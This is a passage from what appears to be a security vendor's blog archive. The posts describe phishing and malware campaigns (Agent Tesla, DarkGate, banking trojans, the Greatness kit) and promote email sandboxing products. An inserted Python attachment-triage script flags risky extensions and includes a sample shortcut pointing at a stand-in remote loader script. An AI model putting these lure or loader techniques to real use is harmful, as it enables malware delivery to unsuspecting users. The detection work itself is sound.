The DLL file searches\r\nfor certain critical system processes and attempts to forcibly stop them, makes changes to the registry that affect\r\nthe Windows Antimalware Scan Interface (AMSI) and ensures that the malware is executed without being\r\ndetected by security solutions. An analysis of the DLL file by researchers at Forcepoint shows the file is from the\r\nAgent Tesla malware family. Agent Tesla is a remote access trojan (RAT) that first appeared in 2014 and grew in\r\npopularity during the COVID-19 pandemic. Agent Tesla is provided under the malware-as-a-service model and is\r\npopular with initial access brokers, who specialize in gaining access to devices and accounts and then sell that\r\naccess to other cybercriminals such as ransomware gangs.\r\nAgent Tesla allows commands to be run on compromised systems and is capable of stealing sensitive information,\r\nsuch as login credentials stored in browsers. The malware can also take screenshots, log keystrokes, and perform\r\nother malicious actions. The malware uses multiple layers of obfuscation to ensure it is not detected by antivirus\r\nsolutions. The malware is commonly used to gain initial access to business networks, primarily through phishing\r\ncampaigns. 
In this campaign, by impersonating a popular travel service company there is a reasonable chance that\r\nthe user may have used the service in the past or have a current booking and will therefore open the email.\r\nEven if they have not, the fact that the emails reference a charge to a credit card may be sufficient to get the user to open the\r\nattachment.\r\nTo protect against this and other malware distribution campaigns, businesses should ensure that they protect all\r\nendpoints with email security and antivirus solutions that are capable of behavioral analysis of files, as Agent\r\nTesla and many other popular malware variants use obfuscation to bypass signature-based security solutions. Web\r\nfiltering solutions provide added protection as they block connections to the malicious URLs that host malware\r\nand they can be configured to block downloads of executable files from the Internet. It is also important to provide\r\nsecurity awareness training to the workforce to raise awareness of cyber threats and conduct phishing simulations\r\nto test the effectiveness of training.\r\nTitanHQ offers a range of cybersecurity solutions for businesses and managed service providers to help them\r\ndefend against cyber threats delivered via email and the Internet, including spam filtering with email sandboxing,\r\nweb filtering, and security awareness training. Give the team a call today to find out more about improving your\r\ndefenses against phishing and malware. All TitanHQ solutions are available on a free trial to allow you to test the\r\nproducts and see for yourself the difference they make.\r\nBusinesses Targeted with Phishing Emails Sent Via SendGrid\r\nby G Hunt | February 23, 2024 | Email Scams\r\nSmall- and medium-sized businesses are being targeted in a phishing campaign that leverages the email service\r\nprovider (ESP) SendGrid. SendGrid is a legitimate and well-known company that provides a customer\r\ncommunication platform for transactional and marketing email. 
SendGrid customer accounts are targeted to gain\r\naccess to company mailing lists which can be used for a variety of email campaigns, such as phishing, spamming,\r\nand scams. In this campaign, the phishers compromise companies’ SendGrid accounts and use the ESP itself to\r\nsend phishing emails. Emails sent through the SendGrid platform are likely to be trusted by email security\r\nsolutions, especially as the compromised accounts will have been used to send communications in the past.\r\nSendGrid may even be whitelisted to ensure that the emails are always delivered to inboxes. SendGrid emails are\r\nalso likely to be trusted by end users.\r\nIn this campaign, the emails use a security-themed lure and inform the recipients that they need to set up 2-factor\r\nauthentication – a perfectly reasonable request since 2-FA will better protect accounts against unauthorized access.\r\nThe users are provided with a link that directs them to a malicious website that spoofs the SendGrid login, and if\r\ncredentials are entered, they are harvested by the scammer. The emails were routinely delivered to inboxes and\r\nevaded email security solutions because SendGrid was trusted.\r\nSendGrid performs stringent checks on new accounts so it is difficult for malicious actors to use SendGrid\r\ndirectly; instead, they compromise business SendGrid accounts, often through phishing attacks. Twilio SendGrid\r\ndetected the malicious activity linked to customer accounts that were being used for phishing, and its fraud,\r\ncompliance, and cyber security teams immediately shut down accounts. 
To better protect SendGrid accounts, users\r\nare advised to log in to their account and set up 2-factor authentication to prevent compromised credentials from\r\ngranting access to user accounts.\r\nThe campaign demonstrates that even emails from reliable sources may not be what they seem. Many companies\r\nprovide security awareness training to their employees that teaches cybersecurity best practices and trains\r\nemployees on how to recognize and avoid phishing. It is important to include these types of emails in training\r\nmaterial, as ESPs are being increasingly targeted by cybercriminals due to the effectiveness of campaigns run\r\nthrough an ESP.\r\nWith SafeTitan, keeping employees up to date on the latest tactics used by phishers and other cybercriminals is\r\neasy. The training content is regularly updated with new phishing templates based on real-world attacks and the\r\nlatest phishing trends, and phishing simulations can be conducted on employees to test how they respond to\r\nphishing attempts outside of the training environment. SafeTitan is the only security awareness training platform\r\nthat delivers targeted training automatically in response to bad security practices by employees, ensuring training\r\nis provided at the moment when it is most likely to be taken on board.\r\nMassive Phishing Campaign Leverages Google Cloud Run to Deliver Banking\r\nTrojans\r\nby G Hunt | February 22, 2024 | Phishing \u0026 Email Spam\r\nA massive malware distribution campaign has been detected that uses phishing emails for initial contact with\r\nbusinesses and Google Cloud Run for hosting the malware. A variety of banking trojans are being distributed\r\nincluding Astaroth, Mekotio, and Ousaban. 
The campaign primarily targets countries in Latin America, and as\r\nsuch the majority of the phishing emails are in Spanish, but Italian versions have also been detected and there are\r\nindications that the campaign is spreading to other regions including Europe and North America.\r\nThe phishing emails used in this campaign appear to be legitimate invoices, statements, and communications from\r\ngovernment and tax agencies and include a link that the recipient must click to view the attached invoice,\r\nstatement, or demand. The link directs the user to services on Google Cloud Run, which is a popular service for\r\nhosting frontend and backend services and deploying websites and applications without having to manage\r\ninfrastructure. Google Cloud Run has been used for hosting malware throughout 2023 but there was a massive\r\nspike in activity that started in September 2023 and has continued through January and February.\r\nOver the past few months, Google’s service has been proving popular with cybercriminals for hosting malware as\r\nit is both cost-effective and is generally not blocked by security solutions. If a user clicks the email link, an MSI\r\nfile is downloaded onto their device. MSI files are executable files, which in this case include embedded\r\nJavaScript that downloads additional files and delivers one or more banking trojans.\r\nThe banking trojans achieve persistence through LNK files in the startup folder that execute a PowerShell\r\ncommand on boot that runs the infection script. The banking trojans are capable of keylogging, clipboard\r\nmonitoring, screenshots, credential theft, and traffic manipulation to direct users to cloned websites of financial\r\ninstitutions to capture banking credentials. 
The Astaroth banking trojan alone targets more than 300 financial\r\ninstitutions as well as cryptocurrency exchanges.\r\nTo protect against this and other malware distribution campaigns, businesses need to adopt a defense-in-depth\r\napproach and should implement multiple layers of protection. The first line of defense is a spam filter or email\r\nsecurity solution to block the initial phishing emails. SpamTitan Plus is a leading-edge anti-spam service that\r\nprovides maximum protection against malicious emails. The solution has better coverage, faster phishing link\r\ndetections, and the lowest false positive rate of any product, which makes it the best spam filter for businesses and\r\nan ideal MSP spam filtering solution. In addition to including all leading phishing feeds to ensure the fastest\r\npossible detection of new phishing threats, SpamTitan Plus uses predictive analysis to identify suspicious URLs\r\nthat have not yet been detected as malicious.\r\nA web filter, such as WebTitan, can be used to control access to the Internet. For example, blocks can be placed on\r\nwebsites and certain categories of websites down to the user level, the solution prevents access to all known\r\nmalicious URLs, and can be configured to block file downloads from the Internet, such as MSI files and other\r\nexecutable files that are often used for malware delivery.\r\nCybercriminals often host malware on legitimate hosting platforms which are usually trusted by security solutions,\r\nwhich means malicious emails may be delivered to end users. It is therefore important to provide security\r\nawareness training for the workforce. Security awareness training raises awareness of the threats that employees\r\nare likely to encounter and teaches them security best practices to help them identify, avoid, and report cyber\r\nthreats. Combined with phishing simulations, it is possible to greatly reduce susceptibility to phishing and\r\nmalspam emails. 
Data from companies that use the SafeTitan security awareness training platform and phishing\r\nsimulator shows susceptibility to phishing threats can be reduced by up to 80%.\r\nIf you are looking to improve your defenses against phishing and malware, give the TitanHQ team a call to find\r\nout more about these products and to help get you set up for a free trial to put these solutions to the test in your\r\nown environment.\r\nMalware Increasingly Distributed via Emailed PDF Files\r\nby G Hunt | February 20, 2024 | Phishing \u0026 Email Spam\r\nThere has been a marked increase in email campaigns using malicious PDF files to distribute malware, rather than\r\nthe typical uses of PDF files for obtaining sensitive information such as login credentials.\r\nIncreased security measures implemented by Microsoft have made it harder for cybercriminals to use macros in\r\nOffice documents in their email campaigns, with PDF files a good alternative. Malicious links can be embedded in\r\nPDF files that drive victims to web pages where credentials are harvested. By using PDF files to house the links,\r\nthey are less likely to be blocked by email security solutions.\r\nOver the past few months, PDF files have been increasingly used to distribute malware. One of the currently\r\nactive campaigns uses malicious emailed PDF files to infect users with DarkGate malware. DarkGate malware is\r\noffered under the malware-as-a-service model and provides cybercriminals with backdoor access to infected\r\ndevices. In this campaign, emails are sent to targets that contain a PDF attachment that displays a fake image from\r\nMicrosoft OneDrive that suggests there was a problem connecting which has prevented the content from being\r\ndisplayed. 
The user is given the option to download the PDF file; however, the downloaded files will install\r\nDarkGate malware.\r\nIn this campaign, clicking the link does not directly lead to the malware download, instead, the click routes\r\nthrough an ad network, so the final destination cannot be identified by checking the link of the download button.\r\nFurther, since the ad network uses CAPTCHAs, the threat actors can make sure that the destination URL is not\r\nrevealed to email security solutions. If the CAPTCHA is passed, the user will be redirected to the malicious URL\r\nwhere they can download the file. This is often a compressed file that contains a text file and a URL file, with the\r\nlatter downloading and running JavaScript code which executes a PowerShell command that downloads and\r\nexecutes the malicious payload.\r\nPDF files have been used in many other malware campaigns, including those that distribute the Ursnif banking\r\nTrojan and WikiLoader malware. Recent campaigns distributing these malware variants have used parcel delivery\r\nlures with PDF file attachments that contain a link that prompts the user to download a fake invoice. Instead of the\r\ninvoice, a zip file is downloaded that contains a JavaScript file. If executed, the JavaScript file downloads an\r\narchive, extracts the contents, and executes the malware payload. Another campaign uses PDF files to install the\r\nAgent Tesla remote access trojan using Booking.com-related lures.\r\nNot only do PDF files have a greater chance of evading email security solutions, they are also more trusted by end\r\nusers than Office file attachments. 
Security awareness campaigns are often focused on training employees about\r\nthe risks of phishing, such as clicking links in unsolicited emails and the risks of opening unsolicited Office files.\r\nMalicious email campaigns using PDF files arouse less suspicion and end users are more likely to be tricked by\r\nthese campaigns.\r\nIt is important for businesses to incorporate PDF files into their security awareness training and phishing\r\nsimulation campaigns to better prepare employees for this growing threat. With SafeTitan, adding new content in\r\nresponse to the changing tactics, techniques, and procedures of threat actors is a quick and easy process. Get in\r\ntouch with the TitanHQ team today to find out more about the SafeTitan security awareness training and phishing\r\nsimulation platform and discover the difference the solution can make to your organization’s security posture.\r\nBusiness Microsoft 365 Accounts Attacks Using Greatness Phishing Kit\r\nby G Hunt | January 31, 2024 | Phishing \u0026 Email Spam\r\nPhishing has long been the most common way that cybercriminals gain initial access to business networks. A\r\nsuccessful attack allows a threat actor to steal credentials and gain a foothold in the network, providing access to\r\nsensitive data and giving them the access they need to conduct a range of nefarious actions. Phishers must develop\r\ncampaigns that are capable of bypassing email security solutions and use lures that are likely to fool end users into\r\ndisclosing their credentials or opening malicious email attachments. 
In recent years, the entry barrier for\r\nconducting phishing campaigns has been significantly lowered through phishing-as-a-service (PhaaS), which has\r\nproven popular with would-be cybercriminals.\r\nPhishing kits are offered that provide everything needed to launch successful phishing campaigns, without having\r\nto spend hours setting up the infrastructure, creating convincing emails, and incorporating anti-detection measures\r\nto ensure emails land in inboxes. A relatively new phishing kit is proving to be particularly popular. The Greatness\r\nphishing kit has been available since mid-2022 and lowers the bar for starting phishing campaigns, requiring a\r\npayment of just $120 a month to use the kit. The Greatness phishing kit allows emails to be customized to suit the\r\nhacker’s needs and add attachments, links, or QR codes to the emails. The kit makes it easy to generate and send\r\nemails and create obfuscated messages that can bypass many cybersecurity solutions and land in inboxes. The kit\r\nalso supports multi-factor authentication (MFA) bypass by performing a man-in-the-middle attack to steal\r\nauthentication codes and can be integrated with Telegram bots.\r\nThe kit has an attachment and link builder that creates convincing login pages for harvesting Microsoft 365\r\ncredentials and even pre-fills the victim’s email address into the login box, only requiring them to enter their\r\npassword. The kit also adds the targeted company’s logo to the phishing page along with a background image that\r\nis extracted from the targeted organization’s M365 login page. As such, the Greatness phishing kit is aimed at\r\nindividuals looking to target businesses and can be easily purchased through the developer’s Telegram channel.\r\nThere were several spikes in Greatness phishing kit activity in 2023, with the latest detected in December 2023\r\nand the increased activity has continued into 2024. 
Phishing kits such as Greatness significantly lower the barrier\r\nfor entry to cybercrime and make it as easy as possible to start phishing, and the low cost of the kit has made it an\r\nattractive option for would-be cybercriminals. This phishing kit is used to target Microsoft 365 users, and the\r\nemails can be convincing and are likely to fool many end users.\r\nThe key to defending against phishing attacks is to implement layered defenses to ensure that a failure of one\r\ndefensive measure does not leave the business unprotected. TitanHQ has developed a suite of cybersecurity\r\nsolutions for businesses and the MSPs that serve them to improve their defenses against phishing, including AI-generated phishing emails and sophisticated phishing kits capable of stealing passwords and MFA codes.\r\nTitanHQ’s PhishTitan provides advanced phishing protection and remediation for Microsoft 365. TitanHQ’s\r\nproprietary machine-learning algorithm integrates directly with Microsoft 365 and catches and remediates\r\nsophisticated phishing including AI-generated phishing emails, business email compromise, spear phishing, and\r\nphishing attacks that bypass MFA. The solution augments rather than replaces EOP and Defender and catches the\r\nphishing attempts that those defensive measures often miss.\r\nPhishTitan uses AI and a large language model (LLM) with proprietary threat intelligence currently not found in\r\nany other anti-phishing solution on the market, and will scan attachments for malicious links and malware, rewrite\r\nURLs, apply banner notifications, and block malicious links. PhishTitan also provides time-of-click protection to\r\ncombat the weaponization of links after delivery. 
The solution uses machine learning algorithms to scan the\r\nmessage body to assess email content and identify words, phrasing, and formatting of emails indicating a phishing\r\nattempt, and will learn over time and become even more effective.\r\nPhishTitan is suitable for businesses of all types and sizes and has been developed from the ground up to meet the\r\nneeds of MSPs. The solution can be set up in less than 10 minutes, and MSPs can add new clients in less than 6\r\nminutes and start protecting them from highly sophisticated phishing attacks. For maximum protection, TitanHQ\r\nalso offers WebTitan DNS filter to protect against web-based attacks, ArcTitan email archiving for security and\r\ncompliance, EncryptTitan for email encryption, SafeTitan for security awareness training and phishing\r\nsimulations, and the SpamTitan Suite of email security solutions. All products are available on a no-obligation,\r\n100% free trial and product demonstrations are available on request. For more information on PhishTitan and\r\nother TitanHQ solutions, give the TitanHQ team a call today.\r\nTitanHQ Launches PhishTitan – AI-Driven Phishing Protection for M365\r\nby G Hunt | January 14, 2024 | Industry News, Phishing \u0026 Email Spam\r\nTitanHQ is proud to announce the addition of a new solution to its cybersecurity portfolio that helps businesses\r\ncombat the growing threat of phishing. PhishTitan provides powerful phishing protection for Microsoft 365 that is\r\ncapable of catching and remediating sophisticated phishing attempts, including spear phishing attacks, business\r\nemail compromise, phishing emails generated by artificial intelligence tools, and zero-day phishing threats that\r\nMicrosoft’s native defenses for M365 fail to detect and block. 
These threats pose the greatest danger, since they are missed by Microsoft’s email security defenses and are\r\ndifficult for employees to identify as malicious: they lack many of the red flags that employees are taught to look\r\nout for in security awareness training programs.\r\nPhishTitan incorporates TitanHQ’s proprietary machine-learning algorithm, which integrates directly with M365.\r\nPhishTitan performs an AI-driven analysis of inbound emails (internal and external) which includes textual\r\nanalysis, link analysis, and attachment scanning. Links are analyzed via multiple curated feeds that constantly\r\nupdate the solution to allow malicious websites linked to phishing and malware distribution to be identified and\r\nblocked. Phishing emails often include links that have been masked to hide the true destination URL. PhishTitan\r\nrewrites URLs to show the true destination. One tactic used by phishers to bypass email security solutions is to\r\nonly weaponize links in emails after delivery. To protect against this tactic, PhishTitan checks inbound emails\r\nbefore delivery to inboxes and also offers time-of-click protection against malicious links in emails.\r\nAttachments are scanned with twin antivirus engines, and suspicious email attachments are sent to the sandbox for\r\nbehavioral analysis. Machine learning detection models scour the body of emails looking for tell-tale signs of\r\nphishing and adapt to constantly changing phishing tactics. The machine learning algorithms also learn from\r\nreports of phishing attempts by end users, which they can report with a single click using a TitanHQ-supplied\r\nOutlook add-in. 
PhishTitan can also be configured to apply banner notifications to external emails and protect\r\nagainst the leakage of sensitive company information.\r\nThe solution has been designed to meet the needs of businesses of all types and sizes and has been developed from\r\nthe ground up to meet the needs of managed service providers (MSPs) to allow them to easily add advanced\r\nphishing protection to their service stacks. It takes around 10 minutes to set up the solution, and around 6 minutes\r\nfor MSPs to onboard new clients.\r\nThe solution was trialed across the TitanHQ user database of more than 12,000 customers and 3,000 MSPs in Q4,\r\n2023, with TitanHQ customers reporting that the solution outperforms their existing anti-phishing solutions.\r\nTitanHQ is now pleased to start offering the new product to new customers. For more information on PhishTitan\r\nphishing protection for Microsoft 365, contact TitanHQ today. PhishTitan is available on a 14-day free trial and\r\nproduct demonstrations can be arranged on request to show you how easy the product is to use and exactly what it\r\ncan do.\r\n“A staggering 71% of MS business users suffer at least one compromised account monthly. With this in mind, the\r\noverwhelming feedback from our customer base has been that phishing is the number one problem to solve in the\r\nemail security community,” said TitanHQ CEO, Ronan Kavanagh. “We therefore allocated resources and\r\ninvestment to develop a solution with new, cutting-edge, robust, fast phishing threat intelligence driven by a team\r\nof security specialists. 
We are pleased to be able to meet the market’s needs with a product that delivers.”\r\nAdvantages and Disadvantages of Email Sandboxing\r\nby G Hunt | November 10, 2023 | Network Security, Spam Software\r\nSandboxing is the use of a virtual environment for testing code and safely opening untrusted files. The sandbox is\r\nan isolated and secure environment that emulates a legitimate endpoint; however, there are no connections to the\r\nbusiness network, the sandbox environment contains no real data, and if dangerous code is executed, no harm will\r\nbe caused.\r\nAdvantages of Email Sandboxing\r\nSandboxing is important because of the sheer number and complexity of threats faced by businesses.\r\nCybercriminal groups are conducting increasing numbers of attacks, new groups are constantly being formed, and\r\ntheir attacks are becoming much more sophisticated. The cost of these attacks and the resultant data breaches is\r\nalso spiraling. According to the 2023 Cost of a Data Breach Report from IBM, on average, data breaches cost\r\n$4.45 million to resolve in the United States and $10.93 million for a healthcare data breach.\r\nMany of these threats come from email. Emails are used to send attachments containing malicious code that\r\ndownloads malware that provides a cyber actor with access to the network. Links to malicious websites are also\r\ndistributed via email where malware is downloaded. While businesses have a degree of protection if they have\r\nanti-virus software installed, most anti-virus solutions can only detect known malware variants – malware that has\r\npreviously been analyzed and had its signature added to the solution’s malware definition list. 
Antivirus solutions\r\nwill not detect new malware variants nor fileless malware, which is executed in the memory with no files\r\ndownloaded to the disk.\r\nSandboxing provides an additional layer of protection against zero-day malware and ransomware attacks and will\r\nallow malicious files to be identified, detected, and quarantined before they can do any harm, even if they have not\r\npreviously been encountered. In the sandbox, malware is identified by the actions it tries to perform, not by any\r\nsignature.\r\nDisadvantages of Email Sandboxing\r\nWhile there are clear benefits, there are some disadvantages of email sandboxing. Businesses may want to add\r\nemail sandboxing to their cybersecurity arsenal, but email sandboxes can be complicated to set up and run, and\r\nthey can require a considerable amount of resources and can be expensive to run. Another of the disadvantages of\r\nemail sandboxing is that analyzing file attachments takes time and messages cannot be delivered until all checks have\r\nbeen performed. It is therefore inevitable that there will be email delivery delays.\r\nAs with any cybersecurity solution, there is the potential for false positives. An email attachment may be\r\ndetermined to be malicious when it is actually harmless. In such cases, important business emails may be blocked\r\nor deleted. The last main disadvantage is that malware often contains code that determines if it has landed on the\r\ntargeted endpoint or if it is in a virtual environment. If the latter is detected, the malware may delete itself or not\r\nperform any of its programmed malicious actions. 
Considering the cost of a successful cyberattack, the advantages\r\nof email sandboxing outweigh the disadvantages, provided the right sandboxing solution is chosen.\r\nSpamTitan Email Security with Sandboxing\r\nSpamTitan is an award-winning email security solution from TitanHQ that provides advanced threat protection at\r\nan affordable price. The solution is easy to implement and use and protects thousands of SMBs and managed\r\nservice providers (MSPs) by blocking spam, viruses, malware, ransomware, and links to malicious websites from\r\nyour emails. SpamTitan’s ATP defense uses inbuilt Bayesian auto-learning and heuristics to defend against\r\nadvanced threats and evolving cyberattack techniques and features an integrated email sandbox tool that is part of\r\nBitdefender’s Global Protective Network.\r\nSpamTitan uses advanced intelligent technologies, such as AI, to predict and prevent advanced threats and the\r\nsandbox accurately mimics a real endpoint to trick malware into determining it has reached its intended target. As\r\nwith any sandbox, there are delays in delivering emails but this is kept to a minimum. SpamTitan has multiple\r\nlayers of security and sophisticated sandbox technology, which means only specific and dangerous emails will be\r\nsandboxed. Even if a legitimate email lands in a sandbox, the delivery delay will be, at most, twenty minutes.\r\nWhile there may be false positives on occasion, no emails are deleted. They are quarantined to allow\r\nadministrators to check the validity of the results.\r\nIf you want to improve security and get the advantages of email sandboxes while eliminating the disadvantages,\r\ngive the TitanHQ team a call today. 
SpamTitan is also available on a free 14-day trial to allow you to test the\r\nproduct and sandbox in your own environment before making a purchase decision.\r\nMalicious File Sandbox for Email\r\nby G Hunt | November 5, 2023 | Network Security, Spam Software\r\nMultiple layers of security are required to protect against increasingly sophisticated email attacks. A malicious file\r\nsandbox for email should be one of those layers to ensure your business is protected against zero-day and stealthy\r\nmalware threats.\r\nEmail: The Most Common Initial Access Vector Used by Cybercriminals\r\nThere are many ways that cybercriminals can attack businesses, but email is the most common initial access\r\nvector. 
Most employees have email accounts which means they can be easily reached, and social engineering\r\ntechniques are used to trick employees into opening malicious attachments or visiting links in emails.\r\nCybercriminals have become adept at exploiting human weaknesses in defenses.\r\nOne of the main aims of email campaigns is to deliver malware to provide persistent access to victims’ networks.\r\nExecutable files may be attached to emails and hidden using double file extensions to make the files appear to be\r\nlegitimate documents, PDF files, or spreadsheets. Office files may be attached that have malicious macros which,\r\nif allowed to run, trigger the download of a first-stage malware payload. The problem for businesses is these\r\ncampaigns are becoming much more sophisticated, they often bypass standard email security defenses, and they\r\nland in inboxes where they can be opened by employees.\r\nDefending against sophisticated email attacks requires a defense-in-depth approach, which should include a spam\r\nfilter/secure email gateway, a web filter, multifactor authentication, an endpoint detection and response solution,\r\nand security awareness training for employees. To improve protection further and defend against new and stealthy\r\nmalware threats, it is important to have a malicious file sandbox for email.\r\nWhat is a Malicious File Sandbox?\r\nA malicious file sandbox is an isolated virtual environment where untrusted, suspicious files can be detonated\r\nsecurely without risking network or data security. The sandbox is used for analyzing emails, documents,\r\napplication files, and other executable files to determine their true nature. 
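As an added example (not TitanHQ's or SpamTitan's code), here is a small attachment triage routine covering the two lures described on this page: executables hidden behind double file extensions, and the compressed file containing a text file plus a URL shortcut that fetches a script (the DarkGate campaign above). It inspects the attachment name and, for zip archives, the member list and any Internet Shortcut target in memory without extracting to disk; the host example.invalid and the sample archive are constructed.

```python
"""Attachment triage for two lures discussed on this page: executables hidden
behind double file extensions (e.g. invoice.pdf.exe) and archives that carry
an Internet Shortcut (.url) file pointing at a remote script.
Added example, not TitanHQ/SpamTitan code; all sample data is constructed."""
import configparser
import io
import zipfile
from urllib.parse import urlsplit

# Extensions Windows will execute or hand to a script/shortcut handler.
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse",
                   "vbs", "vbe", "wsf", "hta", "ps1", "lnk", "url"}
# Extensions that make a name look like a harmless document or image.
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "txt",
                 "rtf", "jpg", "jpeg", "png"}


def check_double_extension(filename):
    """Return a finding if the name is <stem>.<doc-ext>.<exec-ext>, else None."""
    parts = filename.lower().rsplit(".", 2)
    if len(parts) < 3:
        return None
    _, inner, outer = parts
    if inner in DOCUMENT_EXTS and outer in EXECUTABLE_EXTS:
        return f"double extension: looks like .{inner} but runs as .{outer}"
    return None


def parse_internet_shortcut(data):
    """Extract the URL= target from a Windows .url file ([InternetShortcut] INI)."""
    text = data.decode("utf-8", errors="replace").replace("\r\n", "\n")
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(text)
    except configparser.Error:
        return None
    return cp.get("InternetShortcut", "URL", fallback=None)


def shortcut_target_risk(url):
    """Classify where a .url shortcut would send the user if opened."""
    if not url:
        return "no URL= target"
    parts = urlsplit(url)
    path = parts.path.lower()
    ext = path.rsplit(".", 1)[-1] if "." in path else ""
    if parts.scheme == "file":
        return "file:// target on a remote share (script-loader pattern)"
    if ext in EXECUTABLE_EXTS:
        return f"target is a .{ext} script/executable"
    return "external link"


def triage_zip(data):
    """List risky members of a zip archive, reading from memory only."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
            lower = name.lower()
            ext = lower.rsplit(".", 1)[-1] if "." in lower else ""
            dbl = check_double_extension(name)
            if dbl:
                findings.append(f"{name}: {dbl}")
            if ext == "url":
                target = parse_internet_shortcut(zf.read(info))
                findings.append(f"{name}: Internet Shortcut -> {target} "
                                f"({shortcut_target_risk(target)})")
            elif ext in EXECUTABLE_EXTS:
                findings.append(f"{name}: script/executable inside archive")
    return findings


def triage_attachment(filename, data):
    """Combine the name check with archive inspection; an empty list means no finding."""
    findings = []
    dbl = check_double_extension(filename)
    if dbl:
        findings.append(f"{filename}: {dbl}")
    if zipfile.is_zipfile(io.BytesIO(data)):
        findings.extend(triage_zip(data))
    return findings


def build_sample_archive():
    """Constructed sample mirroring the text-file-plus-URL-file layout described above."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", "Open the document to view your invoice.\n")
        zf.writestr("Document.url",
                    "[InternetShortcut]\r\nURL=file://example.invalid/share/loader.js\r\n")
    return buf.getvalue()


if __name__ == "__main__":
    for name, blob in [("invoice.pdf.exe", b"MZ" + b"\0" * 62),
                       ("Document.zip", build_sample_archive()),
                       ("report.pdf", b"%PDF-1.4\n")]:
        print(name, "->", triage_attachment(name, blob) or ["clean"])
```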
When an email is received, it must first\r\npass through a spam filter which looks for the common signatures of spam and phishing emails, performs\r\nreputation checks on the sender, analyzes the message content, and scans email attachments using antivirus\r\nsoftware. The spam filter will filter out the majority of spam and phishing emails and all known malware variants\r\nusing the antivirus software.\r\nThe problem is many email attacks are stealthy and have been developed to be undetectable, and cyber actors are\r\nskilled at getting their emails past email defenses and into inboxes. One way this is achieved is by using\r\npolymorphic malware, which cannot be detected by standard email security solutions and antivirus software. A\r\nmalicious file sandbox is needed to protect against these novel threats.\r\nWhen suspicious files are received that pass the front-end checks, they are sent to the sandbox for in-depth\r\nanalysis of their behavior. The malicious file sandbox is configured to look like a real target environment to ensure\r\nthat when an email is sent to the sandbox any malware acts as it would in the wild and is tricked into determining\r\nthat it has landed on the endpoint of its intended target. No harm can be caused in the sandbox as the environment\r\nis isolated and not set up locally. If malware is detected, a report is generated of any malicious intent or\r\nunexpected actions, and actionable insights are provided to allow the threat to be blocked.\r\nThe SpamTitan Malicious File Sandboxing Service\r\nSpamTitan is an award-winning anti-spam and anti-phishing solution from TitanHQ that is used by thousands of\r\nbusinesses and managed service providers to protect against email-based attacks. 
The solution leverages artificial\r\nintelligence and machine learning algorithms to detect novel threats and predict new attacks, reputation checks are\r\nconducted using SPF, DKIM, and DMARC, users are protected from malicious links in emails, and the solution\r\nhas dual antivirus engines that scan for known malware.\r\nSpamTitan also includes a Bitdefender-powered malicious file sandbox for blocking zero-day malware threats.\r\nThe sandbox analyzes a broad range of targets, including emails, documents, application files, and other\r\nexecutable files, and leverages purpose-built, advanced machine-learning algorithms, aggressive behavior\r\nanalysis, anti-evasion techniques, and memory snapshot comparison to detect sophisticated threats and delivers\r\nadvanced threat protection and zero-day exploit detection. The sandbox also extracts, analyzes, and validates\r\nURLs within files.\r\nThe sandbox is not located on the endpoint so there are no performance implications, and strong machine learning\r\nand behavior detection technologies ensure that only files that require further analysis are sent to the sandbox. If a\r\nmalicious file is detected, the sandbox informs Bitdefender’s cloud threat intelligence service to ensure the threat\r\nis instantly blocked globally and will not need to be sent to the sandbox for analysis again. The sandbox allows\r\nbusinesses to identify and block malicious files such as polymorphic malware and other threats that have been\r\ndeveloped for use in undetectable attacks.\r\nThe SpamTitan malicious file sandbox delivers best-in-class detection, advanced anti-evasion technologies,\r\ninnovative pre-filtering, and MITRE ATT\u0026CK framework support. 
If you want the best protection from\r\ndangerous malware, you need a malicious file sandbox for email, and with SpamTitan you get that and more at a\r\nvery affordable price. For more information on the capabilities of SpamTitan and details of pricing, give the\r\nTitanHQ team a call. SpamTitan is also available on a free 14-day trial to allow you to test the product in your\r\nown environment before making a purchasing decision.\r\nWhat is Message Sandboxing?\r\nby G Hunt | October 28, 2023 | Spam Advice, Spam Software\r\nMessage sandboxing is a security feature of spam filters, secure email gateways, and other email security\r\nsolutions where inbound messages are sent to a secure and isolated environment where the messages are subjected\r\nto behavioral analysis. 
File attachments are detonated and analyzed for malicious properties and actions, such as\r\nattempted file downloads from the Internet, command-and-control center callbacks, and attempts to write code to\r\nthe memory.\r\nWhat is a Sandbox?\r\nIn the technology sense, a sandbox is a contained virtual environment that is separate and isolated from other\r\napplications, operating systems, data, and internal networks. Sandboxes have several uses. In software\r\ndevelopment, a sandbox is used for testing new code, where it can be observed for unexpected compatibility\r\nissues, allowing software developers to troubleshoot the code without causing any harm to live systems and data.\r\nIn cybersecurity, a sandbox is used to open untrusted files, follow potentially malicious links, and analyze\r\nsuspicious code and malware. If malware was installed and executed on a standard machine, the threat actor\r\nwould be given remote access, malware may exfiltrate sensitive data, or in the case of ransomware, encrypt files.\r\nSince the sandbox is a secure environment, any malicious action has no consequences, and files can be studied in\r\nsafety.\r\nA sandbox is a virtual environment that is often configured to mimic a genuine endpoint. One of the first actions\r\ntaken by malware is to explore the environment it is in to check whether it is on a genuine device. If not, it is\r\nlikely not to run any malicious routines and may self-delete to prevent analysis. By configuring the sandbox to\r\nmirror a genuine endpoint, the malware can be tricked into performing its malicious routines, which are detected\r\nand logged. 
The intelligence gathered is fed into the email security solution, and all users of that solution, locally\r\nand globally, will be protected from that malware sample in the future.\r\nWhy is Message Sandboxing Necessary?\r\nTraditional email security solutions check message headers, perform reputation checks of senders, scan email\r\nattachments with antivirus engines, follow embedded hyperlinks, and examine the content of the message for\r\nknown spam and phishing signatures. For many years, these checks alone have been sufficient, ensuring that\r\nmore than 99% of spam and phishing emails are detected and blocked along with all known malware.\r\nEmail attacks have been getting much more sophisticated in recent years and new malware variants are being\r\nreleased at never-before-seen rates. A malware phishing campaign, for instance, will not just use one iteration of\r\nmalware, but many, with each sample differing sufficiently to defeat signature-based detection mechanisms.\r\nCybercriminals are using automation to spin up masses of samples and AI is being used to develop novel phishing\r\nmethods.\r\nAI and machine learning capabilities are now required in email security for blocking these zero-day threats, and\r\nemail message sandboxing is necessary for detecting novel malware threats. Advanced email security solutions\r\nleverage AI, machine learning, and email sandboxing and protect against the rapidly evolving threat landscape.\r\nWithout these features, many malicious messages will be delivered.\r\nHow to 